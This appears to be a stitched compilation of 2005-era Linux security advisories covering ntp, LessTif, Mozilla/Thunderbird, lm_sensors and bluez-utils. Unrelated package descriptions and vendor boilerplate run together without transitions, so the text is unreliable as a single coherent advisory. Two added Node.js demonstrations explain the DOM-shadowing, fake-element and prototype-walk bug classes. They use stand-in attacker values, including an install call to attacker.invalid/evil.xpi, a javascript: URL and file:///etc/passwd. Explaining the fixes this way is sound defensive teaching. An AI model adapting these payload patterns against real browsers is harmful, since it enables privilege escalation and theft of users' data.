Description :
The Network Time Protocol (NTP) is used to synchronize a computer's
time with another reference time source. The ntp package contains
utilities and daemons that will synchronize your computer's time to
Coordinated Universal Time (UTC) via the NTP protocol and NTP
servers. The ntp package includes ntpdate (a program for retrieving
the date and time from remote machines via a network) and ntpd (a
daemon which continuously adjusts system time).

Install the ntp package if you need tools for keeping your
system's time synchronized via the NTP protocol.

Update Information:

When xntpd is started with the -u option and the group is given as a
name rather than a numeric gid, the daemon drops privileges to the gid
of the user's primary group instead of to the requested group. The
daemon therefore runs with a group it was not configured for, which is
not what an administrator relying on -u to confine it expects. This
update fixes the problem.

The Common Vulnerabilities and Exposures project assigned the
name CAN-2005-2496 to this issue.

Description :
LessTif is a free replacement for OSF/Motif(R), which provides a
full set of widgets for application development (menus, text entry
areas, scrolling windows, etc.). LessTif is source compatible with
OSF/Motif(R) 1.2. The widget set code is the primary focus of
development. If you are installing lesstif, you also need to
install lesstif-clients.

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or,
alternatively, you may file a bug at http://bugs.gentoo.org.

A number of vulnerabilities were reported and fixed in
Thunderbird 1.0.5 and Mozilla 1.7.9. Fixes for the following
vulnerabilities have been backported to the packages in this update:

The native implementations of InstallTrigger and other
XPInstall-related JavaScript objects did not properly validate that
they were called on instances of the correct type. By passing other
objects, even raw numbers, the JavaScript interpreter could be made to
jump to the wrong place in memory. Although no proof of concept has
been developed, we believe this could be exploited (MFSA 2005-40).

moz_bug_r_a4 reported several exploits giving an attacker the
ability to install malicious code or steal data, requiring only
that the user perform commonplace actions such as clicking on a link
or opening the context menu. The common cause in each case was
privileged UI code ("chrome") being overly trusting of DOM nodes from
the content window. Scripts in the web page can override properties
and methods of DOM nodes and shadow the native values, unless steps
are taken to get the true underlying values (MFSA 2005-41).

Additional checks were added to make sure JavaScript eval and
Script objects are run with the privileges of the context that
created them, not the potentially elevated privileges of the context
calling them, in order to protect against an additional variant of
MFSA 2005-41 (MFSA 2005-44).

In several places the browser UI did not correctly distinguish
between true user events, such as mouse clicks or keystrokes, and
synthetic events generated by web content. The problems ranged
from minor annoyances like switching tabs or entering full-screen
mode to a variant on MFSA 2005-34. Synthetic events are now
prevented from reaching the browser UI entirely, rather than depending
on each potentially spoofed function to protect itself from
untrusted events (MFSA 2005-45).

Scripts in XBL controls from web content continued to be run
even when JavaScript was disabled. By itself this causes no harm,
but it could be combined with most script-based exploits to attack
people running vulnerable versions who thought disabling JavaScript
would protect them. In the Thunderbird and Mozilla Suite mail
clients JavaScript is disabled by default for protection against
denial-of-service attacks and worms; this vulnerability could be
used to bypass that protection (MFSA 2005-46).

When InstallVersion.compareTo() is passed an object rather than
a string it assumed the object was another InstallVersion without
verifying it. When passed a different kind of object the browser
would generally crash with an access violation. shutdown has
demonstrated that different javascript objects can be passed on
some OS versions to get control over the instruction pointer. We
assume this could be developed further to run arbitrary machine
code if the attacker can get exploit code loaded at a predictable
address (MFSA 2005-50).

A child frame can call top.focus() even if the framing page
comes from a different origin and has overridden the focus()
routine. The call is made in the context of the child frame. The
attacker would look for a target site with a framed page that makes
this call but doesn't verify that its parent comes from the same
site. The attacker could steal cookies and passwords from the
framed page, or take actions on behalf of a signed-in user. This
attack would work only against sites that use frames in this manner
(MFSA 2005-52).

Parts of the browser UI relied too much on DOM node names
without taking different namespaces into account and verifying that
nodes really were of the expected type. An XHTML document could be
used to create fake <IMG> elements, for example, with
content-defined properties that the browser would access as if they
were the trusted built-in properties of the expected HTML elements.
The severity of the vulnerability would depend on what the attacker
could convince the victim to do, but could result in executing
user-supplied script with elevated "chrome" privileges. This could
be used to install malicious software on the victim's machine (MFSA
2005-55).
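
The shadowing problem behind MFSA 2005-41 and the fake-element problem
behind MFSA 2005-55 can be re-enacted without a browser. The following
is an added example written for this page, not Mozilla code: the
Element and HTMLImageElement classes, the NATIVE symbol standing in for
the engine's C++-side node state, and the two chrome-side checks are
all constructed for the demonstration. Gecko's own fix reached the
native values through wrappers; here the same idea is expressed by
reading through the prototype's accessors and checking the namespace.

```javascript
// Added example (not Mozilla code): Node.js re-enactment of the MFSA 2005-41
// and MFSA 2005-55 bug class. Everything below is constructed for the demo.

const XHTML_NS = 'http://www.w3.org/1999/xhtml';
const SVG_NS = 'http://www.w3.org/2000/svg';
const NATIVE = Symbol('native-state'); // stands in for the C++-side node state

// Stand-in for a native element: the true values live in native state and are
// exposed only through prototype accessors, never through own properties.
class Element {
  constructor(localName, namespaceURI, attrs = {}) {
    this[NATIVE] = { localName, namespaceURI, attrs: { ...attrs } };
  }
  get localName() { return this[NATIVE].localName; }
  get namespaceURI() { return this[NATIVE].namespaceURI; }
  get nodeName() { return this[NATIVE].localName.toUpperCase(); }
}
class HTMLImageElement extends Element {
  constructor(attrs) { super('img', XHTML_NS, attrs); }
  get src() { return this[NATIVE].attrs.src ?? null; }
}

// Vulnerable chrome check: reads properties straight off the node, so whatever
// content has shadowed (own properties, own getters) is what chrome sees.
function naiveImageSource(node) {
  if (node.nodeName !== 'IMG') return null;
  return node.src;
}

// Read a property through the prototype's accessor, bypassing any own property
// or getter a content script has defined on the instance.
function nativeGet(proto, node, prop) {
  const desc = Object.getOwnPropertyDescriptor(proto, prop);
  return desc.get.call(node);
}

// Hardened chrome check: confirm the node is a real element (stands in for the
// engine's native type check, which a plain content object cannot forge), then
// verify namespace and local name, and only then read src, all natively.
function hardenedImageSource(node) {
  if (node === null || typeof node !== 'object' || !(NATIVE in node)) return null;
  if (nativeGet(Element.prototype, node, 'namespaceURI') !== XHTML_NS) return null;
  if (nativeGet(Element.prototype, node, 'localName') !== 'img') return null;
  return nativeGet(HTMLImageElement.prototype, node, 'src');
}

// Three content-supplied nodes, constructed for the demonstration.
// 1. MFSA 2005-55 pattern: a plain object posing as <IMG>.
const fakeImg = { nodeName: 'IMG', src: 'chrome://browser/content/evil.xul' };
// 2. MFSA 2005-41 pattern: a genuine image whose src getter content has shadowed.
const shadowedImg = new HTMLImageElement({ src: 'http://example.invalid/a.png' });
Object.defineProperty(shadowedImg, 'src', { get: () => 'javascript:alert(1)' });
// 3. Namespace confusion: an element named "img" outside the XHTML namespace,
//    as an XHTML document can create, carrying a content-defined src.
const svgImg = Object.assign(new Element('img', SVG_NS), { src: 'file:///etc/passwd' });

console.log('naive:   ', naiveImageSource(fakeImg), naiveImageSource(shadowedImg), naiveImageSource(svgImg));
console.log('hardened:', hardenedImageSource(fakeImg), hardenedImageSource(shadowedImg), hardenedImageSource(svgImg));
```

The naive check accepts all three attacker nodes and returns the
attacker's URL in each case; the hardened check rejects the plain
object and the foreign-namespace element and, for the genuine image,
returns the real src rather than the shadowed one.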

Improper cloning of base objects allowed web content scripts to
walk up the prototype chain to get to a privileged object. This
could be used to execute code with enhanced privileges (MFSA
2005-56).
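
The prototype-chain walk described for MFSA 2005-56 is easy to
reproduce with ordinary JavaScript objects. The following is an added
example for this page, not Mozilla code: the "privileged" object, the
base object and both clone routines are constructed to show why a copy
that keeps the original prototype leaks whatever that prototype
inherits.

```javascript
// Added example (not Mozilla code): Node.js re-enactment of the MFSA 2005-56
// bug class. The privileged object stands in for a chrome-side object that
// content must never reach.

const privileged = {
  installPackage(url) { return `installed ${url} with chrome privileges`; },
};

// A chrome-side "base" object that inherits from the privileged one.
const base = Object.create(privileged);
base.title = 'My Page';
base.width = 640;

// Improper clone: copies the own properties but keeps the original prototype,
// so the copy handed to content still inherits from the privileged object.
function improperClone(obj) {
  return Object.assign(Object.create(Object.getPrototypeOf(obj)), obj);
}

// Proper clone: a fresh object with a null prototype that receives only the
// own, enumerable data properties. Functions and nested objects are skipped so
// no privileged callable can ride along inside a property value.
function properClone(obj) {
  const copy = Object.create(null);
  for (const key of Object.keys(obj)) {
    const value = obj[key];
    if (typeof value === 'function') continue;
    if (typeof value === 'object' && value !== null) continue;
    copy[key] = value;
  }
  return copy;
}

// What a content script does with the clone it is given: walk up the
// prototype chain looking for anything privileged and call it.
function contentAttack(clone) {
  for (let obj = clone; obj !== null; obj = Object.getPrototypeOf(obj)) {
    if (Object.prototype.hasOwnProperty.call(obj, 'installPackage')) {
      return obj.installPackage('http://attacker.invalid/evil.xpi');
    }
  }
  return 'no privileged object reachable';
}

console.log(contentAttack(improperClone(base)));
console.log(contentAttack(properClone(base)));
```

With the improper clone the walk reaches the privileged object two
prototypes up and calls into it; with the null-prototype clone the walk
ends immediately while the copied data (title, width) is still usable.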

The updated packages have been patched to address these
issues.

Update:

There was a slight regression in the handling of "right-click"
menus in the packages previously released that is corrected with
this new update.

Javier Fernandez-Sanguino Pena discovered that the pwmconfig
script in the lm_sensors package created temporary files in an
insecure manner. This could allow a symlink attack to create or
overwrite arbitrary files with full root privileges because
pwmconfig is typically executed by root.

The updated packages have been patched to correct this problem
by using mktemp to create the temporary files.

A vulnerability in bluez-utils was discovered by Henryk Plotz.
Because the device name received from a remote Bluetooth device was
not sanitized before use, an attacker could execute arbitrary commands
by supplying them as the device name.
